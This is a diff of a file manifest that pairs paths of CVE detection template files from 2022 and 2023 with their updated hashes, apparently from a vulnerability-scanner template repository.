-http/cves/2022/CVE-2022-4117.yaml:e6691d5c3e272536505ae73224490049c663c874 +http/cves/2022/CVE-2022-40734.yaml:ccad4bac3a8ab0cc3fa07a8503314f1ff26bc6d8 +http/cves/2022/CVE-2022-40843.yaml:6b26b625e95244fe922bfcf60035ca2c72221ce2 +http/cves/2022/CVE-2022-40879.yaml:b28804532d9b383aee4ff98424de408031249e29 +http/cves/2022/CVE-2022-40881.yaml:e0bfd8cce9dd9cced9b8d11c715f7d196967bd29 +http/cves/2022/CVE-2022-4117.yaml:fe7d6f31f507cea2d5488b3e8b113b5ee72aac31 http/cves/2022/CVE-2022-4140.yaml:f243423772b8b2e9cfb6a9a3d8e4bbbbab68b2c9 -http/cves/2022/CVE-2022-41412.yaml:a53e92a3ffc57fe9970417210b4b8e18252a255e -http/cves/2022/CVE-2022-41441.yaml:f6111ca558ce92532a392249f63461c9e27cd506 -http/cves/2022/CVE-2022-41473.yaml:6140ac3153ddc44648f8541e6aa31ddfb0951334 +http/cves/2022/CVE-2022-41412.yaml:ee569356cb4e8502c23ee09bd6cebf5ce577e124 +http/cves/2022/CVE-2022-41441.yaml:5afbd8f84cc2e2db07e9543cc31959bf80ee6f9f +http/cves/2022/CVE-2022-41473.yaml:03a97883fc2c3ce71c5f2f5ec2c89a0289c9c010 http/cves/2022/CVE-2022-41840.yaml:a55753333818330dd5ac198655530d2755a3a239 -http/cves/2022/CVE-2022-42094.yaml:0934908b29dfe93589f6fe9f64cd6ad286089066 +http/cves/2022/CVE-2022-42094.yaml:d803ac73d891e956307bd35e3ecad103fcb7cf83 http/cves/2022/CVE-2022-42095.yaml:2a39087a4ed951945354f872a56e60599e8c0441 -http/cves/2022/CVE-2022-42096.yaml:0f7110cc7a7fc1daa7c154d0a491f66ac6d138dc -http/cves/2022/CVE-2022-42233.yaml:61e0c2de52918b93544e1fe2601a4b6a6dd7379f +http/cves/2022/CVE-2022-42096.yaml:92ec793355e55f7b192e39a6e580494a01014cda +http/cves/2022/CVE-2022-42233.yaml:9a60c63c0249548ccd2d12d1636c082444bf5eda http/cves/2022/CVE-2022-4260.yaml:99c2043ef60f9781825d9e38553528884a3947d9 -http/cves/2022/CVE-2022-42746.yaml:4b72e35a90e450430160f37def0dd7ab657f4a50 -http/cves/2022/CVE-2022-42747.yaml:474e69c648e82b2de88f69d7a4aee2c7bdb4b385 -http/cves/2022/CVE-2022-42748.yaml:f829de4a0f468181c0167e7339c51da7898d32f5 -http/cves/2022/CVE-2022-42749.yaml:144c6d12a52245f29f9b405ff7d147e613209012 -http/cves/2022/CVE-2022-4295.yaml:af2673758843078fc982b03d4cedecc7ec7ebf02 +http/cves/2022/CVE-2022-42746.yaml:213c8cf535b441c4f99b85e20c7fd05684e971eb +http/cves/2022/CVE-2022-42747.yaml:d7a8fdd29605e46e42fd40ea58a2a87a5d9f9256 +http/cves/2022/CVE-2022-42748.yaml:a43253dce089b2de1cfd94f8e0d505113eac45e0 +http/cves/2022/CVE-2022-42749.yaml:68c9aef312a2050077d6c1b5180d3c0d496fb203 +http/cves/2022/CVE-2022-4295.yaml:cad949d5b7b025f6b9d36f57e2035f5735899dd0 http/cves/2022/CVE-2022-4301.yaml:2b4e767bd84ebd4a1c84368b804c469efd73bad7 -http/cves/2022/CVE-2022-43014.yaml:92ead82dd1d835d4389db7b4707f0b3e028d000b -http/cves/2022/CVE-2022-43015.yaml:45e467f955e57a2f18b6daa04ea0f7538ed519cb -http/cves/2022/CVE-2022-43016.yaml:f0b4aa5bda6ca15a0661f8704a6de6dfee5f0563 -http/cves/2022/CVE-2022-43017.yaml:0809d85d86abcc8a9ebe8239b814949b57a0f9ce -http/cves/2022/CVE-2022-43018.yaml:80fd0d27d0ba8be482f0f7dcf638bec40f23a143 -http/cves/2022/CVE-2022-4305.yaml:02092803b8dd031e9d95e8f1ffafc14d7bf5a0f9 +http/cves/2022/CVE-2022-43014.yaml:092f73cfbbec86864123c90772957eb66f29eed6 +http/cves/2022/CVE-2022-43015.yaml:73b346abca3deee61f7fb9d2a781e1e2d34015d3 +http/cves/2022/CVE-2022-43016.yaml:bb8a79e5b8c300e235720d7b66f3b68b254ca353 +http/cves/2022/CVE-2022-43017.yaml:5937d15b707c5206d1ad31849e75cb91caf94f25 +http/cves/2022/CVE-2022-43018.yaml:0e9736fe810ba2bf84dd65901ad8068af00e4915 +http/cves/2022/CVE-2022-4305.yaml:cde1601a9489f64d29fc3371a129f98c9ff8edd5 http/cves/2022/CVE-2022-4306.yaml:4c3e9abf755bb6c3b6ed837fedbfef8364275064 http/cves/2022/CVE-2022-43140.yaml:0322a3a648b2a5c3e0d18c6a4cbf30ece99b5538 -http/cves/2022/CVE-2022-43164.yaml:6e571b25f00a5d2733dde543bc5fedbac473ef85 -http/cves/2022/CVE-2022-43165.yaml:48ed74dc2820a0acc2c9c843e12951f436efb930 -http/cves/2022/CVE-2022-43166.yaml:1ddb937c39b89935f553e2c7acf87886a93bd255 -http/cves/2022/CVE-2022-43167.yaml:709218d04d13e0c07abf4bcd18540b019490777d -http/cves/2022/CVE-2022-43169.yaml:eb77c12bb71d945796881f636ba7a2e3c08f2b85 -http/cves/2022/CVE-2022-43170.yaml:691bed0d3a09bf0c16221296c7b23f38bc754644 -http/cves/2022/CVE-2022-43185.yaml:b57fd260fc55624d9f07644e75bc4764b0eb7551 +http/cves/2022/CVE-2022-43164.yaml:d3655a1cc57f43bd824bea05e8b07b6715aac620 +http/cves/2022/CVE-2022-43165.yaml:1319e504da96cb0b268c19821e014df38e11dec7 +http/cves/2022/CVE-2022-43166.yaml:50790c5c392f01e7d84c8246b90601d36df98449 +http/cves/2022/CVE-2022-43167.yaml:ed99223862bbeca7a59f9b256d3e83a36d888866 +http/cves/2022/CVE-2022-43169.yaml:886425b04de1990ae8765ac89eeea1dc12112f4c +http/cves/2022/CVE-2022-43170.yaml:9197f87eeaf16c75cffb3b4c5f81464bc925350d +http/cves/2022/CVE-2022-43185.yaml:e2948f0b914fc30b8a09db4ebff35960884ef5f7 http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90 -http/cves/2022/CVE-2022-4321.yaml:bd5a8d0548cb324121d5783c7219b93125284470 +http/cves/2022/CVE-2022-4321.yaml:3fd91fa933b7668fe6df56df56faa3c693bd3335 http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8 http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27 -http/cves/2022/CVE-2022-43769.yaml:b733fb9cb4552a09ee498322b084a9016c5dcc3e -http/cves/2022/CVE-2022-44290.yaml:85e3503abca97f455a3945186bd594989b40f683 +http/cves/2022/CVE-2022-43769.yaml:a2914f7437a5ebdcdd3b480f4cbe828714720081 +http/cves/2022/CVE-2022-44290.yaml:c1846eb89065149403e96318b7de144c6fa807a9 http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb -http/cves/2022/CVE-2022-4447.yaml:7b522773f561dcadf6cd9b1dd35626a617a44540 -http/cves/2022/CVE-2022-44877.yaml:900c88227650681436c4ea0e18edad8d660151cc -http/cves/2022/CVE-2022-44944.yaml:a962e361882b8646c2abe7a35aa1011377621b03 -http/cves/2022/CVE-2022-44946.yaml:70cf0be765fbcc0e578592e3ef1327a687236b97 -http/cves/2022/CVE-2022-44947.yaml:690c57490665a5ac71b5e986528f397be7ee3b54 -http/cves/2022/CVE-2022-44948.yaml:529bca0e58da0c48d94378ba0df6c1a29c1266fd -http/cves/2022/CVE-2022-44949.yaml:4efaa78026de42d42471443f6facf77f2b26461a -http/cves/2022/CVE-2022-44950.yaml:dcb79e25f51207c058eebc32b5dc3759057b4aa1 -http/cves/2022/CVE-2022-44951.yaml:fb0c02fa48b944a989db7f1c6047ea4c219d3f6a -http/cves/2022/CVE-2022-44952.yaml:98f0f39417d1b1da4eacbb2c5701080a02e2e667 -http/cves/2022/CVE-2022-44957.yaml:e98e24b7a0627993b880bd607cbcba1114541eac +http/cves/2022/CVE-2022-4447.yaml:9a4bef58f543b34699e05028a6b018ccf8ed7271 +http/cves/2022/CVE-2022-44877.yaml:08b523f22f7b1cb691dd675a63e09d8f722c0d69 +http/cves/2022/CVE-2022-44944.yaml:d5908b9fcca05900a02ad48941ef37bff23c09cd +http/cves/2022/CVE-2022-44946.yaml:75ae504c29405d657a0c462bdd772863e54ca270 +http/cves/2022/CVE-2022-44947.yaml:16f643d647217ef1d75424f3fbd3d6c5ad271713 +http/cves/2022/CVE-2022-44948.yaml:f415128131697bb9cb617ca11fe51e255cbb9a40 +http/cves/2022/CVE-2022-44949.yaml:83a365b7ce07bcc5ecd989fb324f338a6caadca6 +http/cves/2022/CVE-2022-44950.yaml:28661f2344654dfc49fcc91ffcefdb71f063c824 +http/cves/2022/CVE-2022-44951.yaml:549fa91cda9f41aa5044a57761109a3982e307fc +http/cves/2022/CVE-2022-44952.yaml:c629ee34322ee56610296866a376746cae941860 +http/cves/2022/CVE-2022-44957.yaml:097dbdc04c9ec9d0a8917061295cb399d2eb77e8 http/cves/2022/CVE-2022-45037.yaml:6abb4c091e036c9d52b7c996e0c26d9531ba8f4a http/cves/2022/CVE-2022-45038.yaml:d2503018ebb3d9883bc8ed21f43e67f15422aae5 -http/cves/2022/CVE-2022-45354.yaml:a793eb9083095fe06eabeb4851a9762165207fa7 +http/cves/2022/CVE-2022-45354.yaml:3e22708f71f7ba4436269ada83587342f40cdbf5 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 -http/cves/2022/CVE-2022-45365.yaml:adb2db65b0a25e12e6b7869f9b9f64468ae1c418 -http/cves/2022/CVE-2022-45805.yaml:d7f59367ab58445983ca8a77f4d3fe4891bc3001 +http/cves/2022/CVE-2022-45365.yaml:ed3c882d31f0b9a2128e15a9f185962cd9d81f6c +http/cves/2022/CVE-2022-45805.yaml:a049af1b44e8af0e4df790d0ddc6396f07f0187a http/cves/2022/CVE-2022-45835.yaml:420e435b203f5340bdfc7e43ec9407d779f6d22d -http/cves/2022/CVE-2022-45917.yaml:2fdc22fa1a2c734635c1c64eda7872b2cd177ef1 -http/cves/2022/CVE-2022-45933.yaml:ed37fe6a11c49820db8c60c4858b4c7530df3f70 -http/cves/2022/CVE-2022-46020.yaml:8b2716bf9ae7bcbe03eac7c284ed88d82724cb88 +http/cves/2022/CVE-2022-45917.yaml:a912c41b103c15770638bfe8381550a6d12d1516 +http/cves/2022/CVE-2022-45933.yaml:8b1842eb7be2432f70572fd363e94545d6493573 +http/cves/2022/CVE-2022-46020.yaml:8d67b335554da18fb41c72bdbab3aa132081c167 http/cves/2022/CVE-2022-46071.yaml:925a37f307139ce11d93e0485f15d63771038b5f -http/cves/2022/CVE-2022-46073.yaml:e7788e3f94e13fe703a8986a0608358e63657e32 -http/cves/2022/CVE-2022-46169.yaml:81acad5716018e4e2a395e47799c06747cbd42a7 -http/cves/2022/CVE-2022-46381.yaml:3bd8005ec273ce7e2976ae861d775386ee10a524 +http/cves/2022/CVE-2022-46073.yaml:6a2be60284f109569a84565b31582bfb709c96e3 +http/cves/2022/CVE-2022-46169.yaml:ad399cafd666c584f57d4cd12b3c84007b048f58 +http/cves/2022/CVE-2022-46381.yaml:f774ed97b2134dc90158d838c2aa470361978e66 http/cves/2022/CVE-2022-46443.yaml:2de7041c6bb180c94f963123ffc022ecff0d8fc2 -http/cves/2022/CVE-2022-46463.yaml:efbe531c6b022d95ed26274581a5af5183216c53 -http/cves/2022/CVE-2022-46888.yaml:579e14aca37b57dcbf0b41dc9a2271383cd8e2f7 -http/cves/2022/CVE-2022-46934.yaml:02b9ddba75c7a36babdf1cde4d09e16f8e23f501 -http/cves/2022/CVE-2022-47002.yaml:6a2216c6a6714111925f8a82ecf0c9fa5bf5bee5 +http/cves/2022/CVE-2022-46463.yaml:5484def361a7ff3c709b12195a28a14089974358 +http/cves/2022/CVE-2022-46888.yaml:46952f2fbfef5907506dc04fde6cea98af3f6679 +http/cves/2022/CVE-2022-46934.yaml:331381fe839f3033cb1b3984d508a2443b104877 +http/cves/2022/CVE-2022-47002.yaml:b5f20044e9621860a3efb0b32d3856a1934827ad http/cves/2022/CVE-2022-47003.yaml:39b0dcdde25452144702c74bddbf9842ef9c2feb -http/cves/2022/CVE-2022-47075.yaml:d80b880397e3696776237e92a487935e67cf886d +http/cves/2022/CVE-2022-47075.yaml:c1678eb8b857134451836ce2b5f593dd7c05aff4 http/cves/2022/CVE-2022-47501.yaml:5a057cde27d1558e1cf82a1363829f1b07e1e7d0 -http/cves/2022/CVE-2022-47615.yaml:bbe2e07ae5dbd832c2cc65b2f7ca36c030f52b33 -http/cves/2022/CVE-2022-47945.yaml:97169532b2b8b7571b95916c57424e72d7065998 -http/cves/2022/CVE-2022-47966.yaml:af1bb2fa2710b224c472e2a1b5af3838962c2728 -http/cves/2022/CVE-2022-47986.yaml:8ed22d99ee409641cd4ad6ac5f9c82611f723b00 -http/cves/2022/CVE-2022-48012.yaml:8ad3d951e84b4e917c805d17a978e04c6bd31cf8 -http/cves/2022/CVE-2022-48165.yaml:5b832f9fb849f7aadcb963a5c2fa8c87bf309497 -http/cves/2022/CVE-2022-48197.yaml:5698e9353865370a7b92e512b093b974453ff937 -http/cves/2022/CVE-2022-4897.yaml:53f0aba534dc50ab3f73fe45b077340a0f6f791b -http/cves/2023/CVE-2023-0099.yaml:e09f47a4940ff99c8bd70fe410b21e86584deaa7 -http/cves/2023/CVE-2023-0126.yaml:a54e76067a42d920676305e72882b5cb8d6db686 -http/cves/2023/CVE-2023-0159.yaml:06dfde67e7960bf7adf9597508141fdfac598393 -http/cves/2023/CVE-2023-0236.yaml:5fbf81b6152e933910d34f140cede20a70339f8c +http/cves/2022/CVE-2022-47615.yaml:5fd9679a2f05799098398f1c4744f03efbc98406 +http/cves/2022/CVE-2022-47945.yaml:fc6bf1988ae81ba0b7aab2866fbf36092527fb1d +http/cves/2022/CVE-2022-47966.yaml:b4f745ff224a0c1005e847548490607ccab51ae7 +http/cves/2022/CVE-2022-47986.yaml:2a8f07ea60a04d4e8917666f9f8229dc8e668b6b +http/cves/2022/CVE-2022-48012.yaml:468945001c2fda706f19335ba0fccdd41254845f +http/cves/2022/CVE-2022-48165.yaml:0d30e08a304606adecb631a940f674bfa06f8b46 +http/cves/2022/CVE-2022-48197.yaml:fcdf74df464deab4276806b2fd1d8d11e7849c36 +http/cves/2022/CVE-2022-4897.yaml:92f778ba997e0d796420c1236682069f0b0f9779 +http/cves/2023/CVE-2023-0099.yaml:cdfed327c29ff370e6b06c37aa366dab18e1165f +http/cves/2023/CVE-2023-0126.yaml:6622dccea76462d0952ff1db6e35da809393d97a +http/cves/2023/CVE-2023-0159.yaml:dad65813c9a2a5d95fefa066072e4dcb30a33414 +http/cves/2023/CVE-2023-0236.yaml:59baf08b76758762d47f413d236485cf5b319dce http/cves/2023/CVE-2023-0261.yaml:5087fa9d04efc600b41de02fcac82bda2bcf0595 -http/cves/2023/CVE-2023-0297.yaml:e7baf32f9942f688924d9a162dc7551de98dde89 -http/cves/2023/CVE-2023-0334.yaml:adafbaa999b2d81291647630f256534cf89e1964 -http/cves/2023/CVE-2023-0448.yaml:b1ef2c2f82671bf7768df19ac61414b49a800956 -http/cves/2023/CVE-2023-0514.yaml:cddeb96f132ed763163b122c5fd44456704ddf57 -http/cves/2023/CVE-2023-0527.yaml:0e9801c97087f3aa24b6257d56e6772b0e693c59 -http/cves/2023/CVE-2023-0552.yaml:0760deedf488e135c767704cd7e9ba47452832b5 -http/cves/2023/CVE-2023-0562.yaml:dedbac0108d92c16a716dfee990455027942e09f +http/cves/2023/CVE-2023-0297.yaml:ace64d1b8ef97f2466a2718a5d62fd9bc3363962 +http/cves/2023/CVE-2023-0334.yaml:e64c269ae26b3ae9cc1018c96b7c988d1ce7d16b +http/cves/2023/CVE-2023-0448.yaml:602dc4fb8805fa78abee06c6aaea0e867a814943 +http/cves/2023/CVE-2023-0514.yaml:b76094833ad8697323609f0e18538edda46b4526 +http/cves/2023/CVE-2023-0527.yaml:e2ce6556221604eb1a240ee35fe9b2ffc3bbdea5 +http/cves/2023/CVE-2023-0552.yaml:5ee8de972f89dc61566d00978c7365a55f9df39e +http/cves/2023/CVE-2023-0562.yaml:86e35de0ffd83e90947e7c4b0b49836230bde3bc http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 -http/cves/2023/CVE-2023-0600.yaml:09edb6a74e6c8b298542d990288279230e8755b8 -http/cves/2023/CVE-2023-0602.yaml:ff8508c23cf1205eacdf532b97243ed38c44192a -http/cves/2023/CVE-2023-0630.yaml:79c8dee6873225aaf9f80e29a2fe2ecd54b0cadc -http/cves/2023/CVE-2023-0669.yaml:6d285a26e93cfa32c6caa2c5836644273e50c8a6 -http/cves/2023/CVE-2023-0678.yaml:63b5b4ff9f86d447ef93ab3ef1459090de165b88 +http/cves/2023/CVE-2023-0600.yaml:fcfb1a40a3cd2e7df90c774102fd125bd335b405 +http/cves/2023/CVE-2023-0602.yaml:e31c5d2abf85c2ee480612417a8d6a784ea0c190 +http/cves/2023/CVE-2023-0630.yaml:3e345bf8bc629f39a8cd585c837348d7600981bf +http/cves/2023/CVE-2023-0669.yaml:b6c8c235c98d2f2bf23b28b62006591fcf62aabf +http/cves/2023/CVE-2023-0678.yaml:8c8f0e339ac17af3d2efac4b3ec82cdbbb279bb6 http/cves/2023/CVE-2023-0777.yaml:695dc3b34a41b2d46cabcb2c40a57b3fe284f036 -http/cves/2023/CVE-2023-0900.yaml:b759bab8d921f6f87047fe65b1a8270a25ac6c78 -http/cves/2023/CVE-2023-0942.yaml:727aa39921928b56f641bda22efa7bc0ceaa8b2a -http/cves/2023/CVE-2023-0947.yaml:99ec36b3fb58ac77cdb7da8e784120ca7d58bd3b -http/cves/2023/CVE-2023-0948.yaml:0367e3cf81b12e51330d0b1ab2d09761172a554d -http/cves/2023/CVE-2023-0968.yaml:ae1e19b9b10293fe400ba1410af6e61fe97fcb12 -http/cves/2023/CVE-2023-1020.yaml:5636fe07aa03fa9f3a0b33826c8f8f7a690f7925 -http/cves/2023/CVE-2023-1080.yaml:bcb835fba141a11986b02014068b75190537899c -http/cves/2023/CVE-2023-1177.yaml:f14c03311e38c1d9faebb9a86ee2723b3f417f87 -http/cves/2023/CVE-2023-1263.yaml:04b6a372edaa449d9f7d09dde92c7f53f70718e8 -http/cves/2023/CVE-2023-1362.yaml:cdee456e5b9cf88406cf478d4f9c519dc7ba89df -http/cves/2023/CVE-2023-1408.yaml:dc5282fda3dc97da2b9c2be50065535af09f6fc9 +http/cves/2023/CVE-2023-0900.yaml:cbef37de88d0b61540d3d8b63c80c09960b6c21e +http/cves/2023/CVE-2023-0942.yaml:fcb0811220da813890a775f5c00e2f91cf2c340b +http/cves/2023/CVE-2023-0947.yaml:2d43c3e9a69df1ec17476ed2b0895fe38ede4d06 +http/cves/2023/CVE-2023-0948.yaml:c0b92cf821b6f4b80dd5135d77ad852a8049a9bb +http/cves/2023/CVE-2023-0968.yaml:0f3618d7652e69aaba867716e2bdf1217430566c +http/cves/2023/CVE-2023-1020.yaml:62fc61d24e0e1681b1bf64d37033caecf096364a +http/cves/2023/CVE-2023-1080.yaml:57fd2d5ede5e09e53ef5c560add050d334ba9b09 +http/cves/2023/CVE-2023-1177.yaml:3f5f39078e73040951a342c72dd0417a62d0637f +http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 +http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 +http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:35cc7af9bfe87b4a88a973a22dae4cc94a23bd97 -http/cves/2023/CVE-2023-1454.yaml:f507915aeffd9373633f9903f3f42fd148ae631f -http/cves/2023/CVE-2023-1496.yaml:07cd1dcd0767b93ad10044260e11e4cbb12875ac -http/cves/2023/CVE-2023-1546.yaml:e1ce7e4455e8d70f81d039868cfa7c05e9b7950c -http/cves/2023/CVE-2023-1671.yaml:681f98443bbfc4892fc531bf522cf922ba80f813 -http/cves/2023/CVE-2023-1698.yaml:e945233b316cdedba4ca8e9d7b5fc33755f55d26 -http/cves/2023/CVE-2023-1719.yaml:7837cfc713541d4998a43dd94e445eedf1583e70 -http/cves/2023/CVE-2023-1730.yaml:0ac62ee0d8e280f74152e8189f92a7dcbd1a0d04 -http/cves/2023/CVE-2023-1780.yaml:a13c9a4883fbae14fc1fdfaffb1e1b0d942a6338 -http/cves/2023/CVE-2023-1835.yaml:10fd479ca3a5aa355acbca9f948ac5cfc84174b3 -http/cves/2023/CVE-2023-1880.yaml:6d83ee09fbe4910f81808b87ef627188221ff428 -http/cves/2023/CVE-2023-1890.yaml:8cbb29b8a367580d3c3df12f01b6f44096964487 -http/cves/2023/CVE-2023-1892.yaml:b427a93cbc382d7f03e99c1a52d0179c76b83cc2 -http/cves/2023/CVE-2023-20073.yaml:32602a37f6dedce15b6c14cfc174e3ab4a412b75 -http/cves/2023/CVE-2023-2009.yaml:0e458c2616c9e35744adb4e65737b8801f074695 +http/cves/2023/CVE-2023-1454.yaml:e0b6ba7bc52ecb2e58d67b61ca3ef3010851a0fc +http/cves/2023/CVE-2023-1496.yaml:985b6d064c077e56a9214edaa14905cde2aeae6e +http/cves/2023/CVE-2023-1546.yaml:8c8e4f20d034c05c48d5cdd431661c5b40ef7860 +http/cves/2023/CVE-2023-1671.yaml:997286cbd7021b668c2f6510ac971fcb46b86925 +http/cves/2023/CVE-2023-1698.yaml:6fef0e18d2d0772e0781dba7a71d4d002ec40300 +http/cves/2023/CVE-2023-1719.yaml:fbe0a29e87d24ce8d3bfc97713e592b06c2de057 +http/cves/2023/CVE-2023-1730.yaml:db103227ee8d88ba94638a6b952356057f095ae2 +http/cves/2023/CVE-2023-1780.yaml:621e1a9e470723487065088b68c3da0d8b403231 +http/cves/2023/CVE-2023-1835.yaml:ba80a61d4cc2d0c561efb5994071542c2a59a500 +http/cves/2023/CVE-2023-1880.yaml:00d09d7b221180a15759e6629e3279c98cd53ea5 +http/cves/2023/CVE-2023-1890.yaml:3330b642e76c981f041c0275e19aa44d0f3b8bd2 +http/cves/2023/CVE-2023-1892.yaml:0628d24acbfbbd6a5079d77de9455bf90f0e091c +http/cves/2023/CVE-2023-20073.yaml:94402e66e673901266d834d82e411b71933190ef +http/cves/2023/CVE-2023-2009.yaml:6680fb1da94a211cbb09a77d3b19a9b4165dc8a1 http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 -http/cves/2023/CVE-2023-2023.yaml:6711a89e6918606b2dd7d47c76153e28261094b0 -http/cves/2023/CVE-2023-2059.yaml:d90234f615f76231d2e24221befc70aed4a1a8c9 -http/cves/2023/CVE-2023-20864.yaml:22050ddba9d20317baad72a08ded7974446dea6e -http/cves/2023/CVE-2023-20887.yaml:b1b143618d3396f595f72022fa53239a8b069a5e -http/cves/2023/CVE-2023-20888.yaml:efa8475387c2ab727684b086e65cb5d292a2a73a -http/cves/2023/CVE-2023-20889.yaml:16a60a2c49b7b52e149c9a108e3ed9d814607501 -http/cves/2023/CVE-2023-2122.yaml:46ca5a614d4044ae9ef00b08846d515fc92af1a6 -http/cves/2023/CVE-2023-2130.yaml:09284dfc7455d0803979c640213c48b540b0320a -http/cves/2023/CVE-2023-2178.yaml:9d030e9e9e685cff2820ffcda48385c1f1c3ed02 -http/cves/2023/CVE-2023-22232.yaml:405eae8487cd087f14eb89f375ee2ad4fdb39fef -http/cves/2023/CVE-2023-2224.yaml:ccf9b19f8648317b36a26d95da4e7ff5eaa2a076 -http/cves/2023/CVE-2023-2227.yaml:a543fd2374500619eabd60a33e9c3505301f3e9c -http/cves/2023/CVE-2023-22432.yaml:24909cb5a915d9380fa96d050b24d80d1a6f7348 -http/cves/2023/CVE-2023-22463.yaml:cc556e03212aad829d648982872bc5faf1736d6e -http/cves/2023/CVE-2023-22478.yaml:ef6e66eb6d47a4d69eaf216b2c1efd78ce62c36d -http/cves/2023/CVE-2023-22480.yaml:73ce7854345335bda42d333c7c0ff06814ff0aed -http/cves/2023/CVE-2023-22515.yaml:739c18a0ae5877afcec00abdb56fe6903cac125e -http/cves/2023/CVE-2023-22518.yaml:43089328e1ed1386683d74f8483b06a55767f8cd -http/cves/2023/CVE-2023-2252.yaml:6bdd5a55d3be400de7f3aa5b04a1e0cde7fc1d3e -http/cves/2023/CVE-2023-22527.yaml:c53d2a4bba640a999631b07b9cea85b371f4cb45 -http/cves/2023/CVE-2023-22620.yaml:b41d8e2aca1d8f11f7ef58bddaab7c900ef27175 -http/cves/2023/CVE-2023-2272.yaml:75fb822252ec07ce5f8c8234d5c99dbc214a5a8a -http/cves/2023/CVE-2023-22897.yaml:1dc50bc03e62695bf9930998ac50d1e8532031ca -http/cves/2023/CVE-2023-23161.yaml:330962071a2da439c6f4ad2cfd9399673b3c3748 -http/cves/2023/CVE-2023-23333.yaml:c82c96716e574b2ac6f5243a42561e6b661697d7 -http/cves/2023/CVE-2023-23488.yaml:cce2f22d82bdbb32512be4899c8956b8a98469b3 -http/cves/2023/CVE-2023-23489.yaml:e2f4be81d387be5eb2856fe6218282fee51428fb -http/cves/2023/CVE-2023-23491.yaml:7432abe66255565410e775aed3599fe72f64babf -http/cves/2023/CVE-2023-23492.yaml:9412ada1002d29956c069b2d1ed3fa39ebf9d4ca -http/cves/2023/CVE-2023-2356.yaml:afcfcb280eaa73e7841563176920159586de1c48 -http/cves/2023/CVE-2023-23752.yaml:855cd21aad48643be8adce80ee4a57b3cfaeb3e3 -http/cves/2023/CVE-2023-24044.yaml:b1fcbf242f8611b3d7429bbc30319b6a1cfded2e -http/cves/2023/CVE-2023-24243.yaml:5d77029d1e00451d81039ca3c90ea6df376e07b5 -http/cves/2023/CVE-2023-24278.yaml:1923ae74c574d89888f1c0724a3c6a58afe4d460 -http/cves/2023/CVE-2023-24322.yaml:08bc0c874464a6fc3abc02de139fe9083c41b221 +http/cves/2023/CVE-2023-2023.yaml:226bf02b5318dc6cfebadd23d5aecb21c651e9c2 +http/cves/2023/CVE-2023-2059.yaml:0cca32c1ba98932cbe6b413055becd7affc69b27 +http/cves/2023/CVE-2023-20864.yaml:00440eaddd70c1fa0c48a1382e6d85d69abd7fee +http/cves/2023/CVE-2023-20887.yaml:a8fd31ef3cc60ff2572b0ef5f182862e9a064ede +http/cves/2023/CVE-2023-20888.yaml:f13a7f0b88d50776a333b40a138f82c633d125a0 +http/cves/2023/CVE-2023-20889.yaml:5bfb70330fa3b04f5b0af636c18a2c6a5267ac4b +http/cves/2023/CVE-2023-2122.yaml:7dca84047ac5d644ee1d20ea67b70e4bd36947ed +http/cves/2023/CVE-2023-2130.yaml:314de8c387b9e0bd75dd8a98f0c7283185b83db9 +http/cves/2023/CVE-2023-2178.yaml:3907c43ef047c7398dd6c6075b7eb37f81431e7f +http/cves/2023/CVE-2023-22232.yaml:2ba9592c818ffec5b515fe7b5daa05c39e5c0075 +http/cves/2023/CVE-2023-2224.yaml:e0d9099e5025c8aa7b3e29c3aa6ba735e4be50f2 +http/cves/2023/CVE-2023-2227.yaml:419bd91b84cd26b87741523630753ff62a0f6f56 +http/cves/2023/CVE-2023-22432.yaml:9dbb7e336e8db33be5b66a8eabc22e1b165014b3 +http/cves/2023/CVE-2023-22463.yaml:2d955943e22db088cf96527a0829132e5772b7ca +http/cves/2023/CVE-2023-22478.yaml:60828118fe9d7a7642c22b6ec8e8823c3142587a +http/cves/2023/CVE-2023-22480.yaml:2aa43dfc6c7beaeafaee0862b0c4e72d5f868e92 +http/cves/2023/CVE-2023-22515.yaml:001d637ac8df397f671aefa6c8f939f3d5410c64 +http/cves/2023/CVE-2023-22518.yaml:578d6d85b9a2c589620c071d13415f4dd95195e6 +http/cves/2023/CVE-2023-2252.yaml:540bf478302df8c091ec14e8403a46ac8f8d0933 +http/cves/2023/CVE-2023-22527.yaml:3a3e37278c23e88e83755249211c24b057478d53 +http/cves/2023/CVE-2023-22620.yaml:9a4fb268f6aad7753f3a0d3a2222b5946221ed79 +http/cves/2023/CVE-2023-2272.yaml:94a125ff04e62b2d1bda69787e8fd1019a36be42 +http/cves/2023/CVE-2023-22897.yaml:c46463ab516bb1faf879b0d29483e13138d356fd +http/cves/2023/CVE-2023-23161.yaml:edb754d19bcded64d5d054c11b355f252081d087 +http/cves/2023/CVE-2023-23333.yaml:f04c8f6519d52c53935243fb10dc6cddde95a27b +http/cves/2023/CVE-2023-23488.yaml:4701ba1c43a8888bef0092585a3666bc4e3809b5 +http/cves/2023/CVE-2023-23489.yaml:eb3988e79364bf65b6116f6040271a11ba06908d +http/cves/2023/CVE-2023-23491.yaml:30046ed227b359bae6f8e485f89933d9955612da +http/cves/2023/CVE-2023-23492.yaml:16fa0c1fc4002b952a33b61d3fabc64636ac7f23 +http/cves/2023/CVE-2023-2356.yaml:e48691aae0f032a6a3b25b934d0d1334e88b687a +http/cves/2023/CVE-2023-23752.yaml:c3505ebba983ea2f6c82bf34c77267ce5f8d396f +http/cves/2023/CVE-2023-24044.yaml:f85c5c11a2671b5285303f12ee1e9eb85ada8f3e +http/cves/2023/CVE-2023-24243.yaml:4e42089c2b7118d593f336cea101baec62433654 +http/cves/2023/CVE-2023-24278.yaml:1d2306f9d9cb2d17f8e79ee9cac52005c5a55cfe +http/cves/2023/CVE-2023-24322.yaml:1f16814c9e0527336a70b07183df6a08843dd52b 